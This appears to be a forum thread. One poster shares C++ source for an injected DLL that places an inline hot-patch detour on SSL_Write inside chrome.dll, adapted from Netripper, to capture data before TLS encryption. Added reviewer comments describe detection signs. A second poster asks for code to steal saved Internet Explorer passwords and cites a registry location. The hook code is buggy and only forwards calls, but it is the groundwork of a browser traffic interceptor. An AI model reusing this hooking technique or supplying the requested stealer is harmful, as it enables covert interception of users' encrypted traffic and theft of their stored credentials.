
zabuz


  1. i have seen several posts about SSL_Write , Netripper and all that, but something really gets me confused when i try to hook it , Maybe, thats what is confusing the other fellow whos been working on it for sometime Today i decided to have a look about Hooking SSL_Write and i decided to try out with source code from rohitab, credits goes to Napalm. my source code looks like this

// Reviewer note: this listing is a DLL that, from DllMain on process attach,
// tries to place an inline (hot-patch style) detour on an export named
// SSL_Write in chrome.dll. A hook at that call site sees the caller's buffer
// before TLS encryption, which is why this pattern matters to defenders.
// Observables: an unexpected DLL loaded into the browser process, a
// VirtualProtect call that flips an image-backed code page to
// PAGE_EXECUTE_READWRITE, and function-entry bytes in memory that no longer
// match the module file on disk. Process mitigation policies that restrict
// which DLLs may load, or that forbid making code pages writable, target the
// load step and the patch step respectively.
#include "stdafx.h"
#include <Windows.h>
#include <stdlib.h>
#include <stdio.h>
using namespace std;

// Start address and size of one PE section, both held as 32-bit values.
struct SECTION_INFO { DWORD dwStartAddress; DWORD dwSize; };

// Receives the address PatchAPI stores for calling the original function.
DWORD (*OldSSL_Write)(void *s, const void *buf, int len);

// Installs a hot-patch detour on lpszFunc exported by lpszLib.
//   lpszLib    - module name passed to LoadLibrary
//   lpszFunc   - export name passed to GetProcAddress
//   lpOldFunc  - out: receives (function address + 2)
//   fpNewFunc  - replacement the detour jumps to
// Returns TRUE only when the export resolves, the expected byte pattern is
// present and the first VirtualProtect succeeds; FALSE otherwise.
BOOL PatchAPI(LPSTR lpszLib, LPSTR lpszFunc, FARPROC *lpOldFunc, FARPROC fpNewFunc) // by Napalm
{
    BOOL bResult = FALSE;
    DWORD dwProtect;
    LPBYTE lpPatch;
    FARPROC fpOldFunc;
    fpOldFunc = GetProcAddress(LoadLibrary(lpszLib), lpszFunc);
    if(fpOldFunc){
        // The 5 bytes immediately before the function entry.
        lpPatch = (LPBYTE)fpOldFunc - 5;
        // Proceed only if those 5 bytes are 0x90 (NOP) and the function starts
        // with 8B FF (mov edi, edi), i.e. the hot-patchable prologue layout.
        if(!memcmp(lpPatch, "\x90\x90\x90\x90\x90\x8B\xFF", 7)){
            // Code page made writable and executable: the step a memory-protection
            // monitor would see.
            if(VirtualProtect(lpPatch, 7, PAGE_EXECUTE_READWRITE, &dwProtect)){
                // E9 rel32: near jump written into the padding, displacement
                // computed relative to the function entry.
                *lpPatch = 0xE9;
                *(LPDWORD)(lpPatch + 1) = (DWORD)((LONG)fpNewFunc - (LONG)fpOldFunc);
                // Hand back the address just past the 2-byte prologue instruction.
                *(LPDWORD)lpOldFunc = ((DWORD)fpOldFunc + 2);
                // Swap the first two bytes of the function for EB F9 (short jump
                // back into the padding) in one interlocked write; the upper 16
                // bits of the dword are preserved.
                InterlockedExchange((LPLONG)fpOldFunc, (LONG)((*(LPDWORD)fpOldFunc & 0xFFFF0000) | 0xF9EB));
                // Attempt to restore the saved protection; the result is not checked.
                VirtualProtect(lpPatch, 7, dwProtect, NULL);
                bResult = TRUE;
            }
        }
    }
    return bResult;
}

// Linear byte search for p_pvBuffer inside [p_pvStartAddress, +p_dwSize).
// Returns the address of the first match cast to DWORD, or 0 after writing a
// debug string when nothing matches.
DWORD SearchMemory(void* p_pvStartAddress, DWORD p_dwSize, void *p_pvBuffer, DWORD p_dwBufferSize)
{
    unsigned char *pByte = (unsigned char *)p_pvStartAddress;
    for(size_t i = 0; i < p_dwSize - p_dwBufferSize; i++)
    {
        if(memcmp(pByte + i, p_pvBuffer, p_dwBufferSize) == 0)
        {
            return (DWORD)(pByte + i);
        }
    }
    OutputDebugStringA("[ERROR] SearchMemory did not find the pattern!");
    return 0;
}

// Same scan as SearchMemory, but counts matches and returns the address of
// match number p_nN (counting starts at 1). Returns 0 after writing a debug
// string when fewer than p_nN matches exist.
DWORD SearchMemoryByN(void* p_pvStartAddress, DWORD p_dwSize, void *p_pvBuffer, DWORD p_dwBufferSize, unsigned int p_nN)
{
    unsigned char *pByte = (unsigned char *)p_pvStartAddress;
    unsigned int n = 0;
    for(size_t i = 0; i < p_dwSize - p_dwBufferSize; i++)
    {
        // Find each occurrence and return the N'th one
        if(memcmp(pByte + i, p_pvBuffer, p_dwBufferSize) == 0)
        {
            n++;
            if(n == p_nN) return (DWORD)(pByte + i);
        }
    }
    OutputDebugStringA("[ERROR] SearchMemory did not find the pattern!");
    return 0;
}

// Replacement target for the detour. In this listing it only forwards the
// call to OldSSL_Write and returns its result; the buffer is not read, copied
// or logged here.
int WINAPI NewSSL_Write(void *s, const void *buf, int len)
{
    return OldSSL_Write(s, buf, len);
}

// Loads p_sModule, copies its DOS header, NT headers and section table, and
// returns a SECTION_INFO filled from the section headers it walks.
// p_sSection is accepted as a parameter; bFound is declared but not used.
SECTION_INFO GetModuleSection(LPCSTR p_sModule, LPCSTR p_sSection)
{
    SECTION_INFO oSectionData = {0, 0};
    bool bFound = 0;
    HANDLE hLib = LoadLibraryA(p_sModule);
    if (!hLib)
    {
        OutputDebugStringA("[ERROR] Cannot Find Chrome.dll\n");
    }
    IMAGE_DOS_HEADER dos;
    IMAGE_NT_HEADERS ntHeaders;
    IMAGE_SECTION_HEADER *pSections = NULL;
    // Get DOS/PE header
    memcpy(&dos, (void *)p_sModule, sizeof(IMAGE_DOS_HEADER));
    memcpy(&ntHeaders, (void *)((DWORD)p_sModule + dos.e_lfanew), sizeof(IMAGE_NT_HEADERS));
    // Get sections
    pSections = new IMAGE_SECTION_HEADER[ntHeaders.FileHeader.NumberOfSections];
    if(pSections == NULL)
    {
        OutputDebugStringA("[ERROR] Cannot allocate space for sections: ");
    }
    // Copy the section table that follows the NT headers
    memcpy(pSections, (void *)((DWORD)p_sModule + dos.e_lfanew + sizeof(IMAGE_NT_HEADERS)), ntHeaders.FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER));
    // Each iteration writes that section's raw size and start address into oSectionData.
    for(size_t j = 0; j < ntHeaders.FileHeader.NumberOfSections; j++)
    {
        oSectionData.dwSize = pSections[j].SizeOfRawData;
        oSectionData.dwStartAddress = (DWORD)p_sModule + pSections[j].VirtualAddress;
    }
    return oSectionData;
}

// Entry routine called from DllMain: queries two sections of chrome.dll, runs
// two pattern searches over the second, then calls PatchAPI for "SSL_Write" and
// shows a message box if PatchAPI reports success.
void HookChromeBoringSSL()
{
    SECTION_INFO rdata = {0, 0};
    SECTION_INFO text = {0, 0};
    // 0x68 is the opcode of push imm32; the four operand bytes are zero here.
    unsigned char PSH_string[] = {0x68, 0x00, 0x00, 0x00, 0x00};
    // Build-path string of the BoringSSL source file, declared but not referenced below.
    unsigned char SSL_string[] = "c:\\b\\build\\slave\\win\\build\\src\\third_party\\boringssl\\src\\ssl\\ssl_lib.c";
    const unsigned int nBytesBeforeRead = 17;
    const unsigned int nBytesBeforeWrite = 17;
    const unsigned int READ_IND = 17;
    const unsigned int WRITE_IND = 15;
    rdata = GetModuleSection("chrome.dll", ".rdata");
    text = GetModuleSection("chrome.dll", ".text");
    SearchMemoryByN((void *)text.dwStartAddress, text.dwSize, (void *)PSH_string, 5, READ_IND);
    SearchMemoryByN((void *)text.dwStartAddress, text.dwSize, (void *)PSH_string, 5, WRITE_IND);
    if(PatchAPI("chrome.dll", "SSL_Write", (FARPROC *)&OldSSL_Write, (FARPROC)NewSSL_Write))
    {
        MessageBoxA(NULL,"Hooked","",MB_OK);
    }// Using Napalms Patch
}

// DLL entry point: the hook routine runs once, when the DLL is attached to a
// process; the other notification reasons do nothing.
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
    switch(ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        HookChromeBoringSSL();
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}

Had to cull a lot of things from Netripper, but i dont see it to pop out the MessageBox,"Hooked " . Started to seem like i dont know what i'm Doing.
  2. Hi, good morning. I need snippets for an Internet Explorer stealer. I understand the passwords are saved somewhere like HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Storage. I have seen snippets for Chrome and Firefox; I just need something similar for Internet Explorer, for security testing. Kindly help.